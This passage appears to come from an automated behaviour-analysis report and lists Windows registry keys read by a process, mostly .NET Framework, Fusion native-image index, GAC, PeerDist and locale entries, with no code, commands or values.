HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DiscoveryManager\RepubQuorumSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DiscoveryManager\MinBackoffWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DiscoveryManager\DiscoveryProviderDllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\Publisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Publisher
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PeerDist\Roaming
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Roaming
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Roaming\ForceRoamingDetect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Roaming\RefreshDllName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Roaming\RefreshProcName

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_CURRENT_USER\di
HKEY_CURRENT_USER\Environment\SEE_MASK_NOZONECHECKS
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgJITDebugLaunchSetting
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgManagedDebugger
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
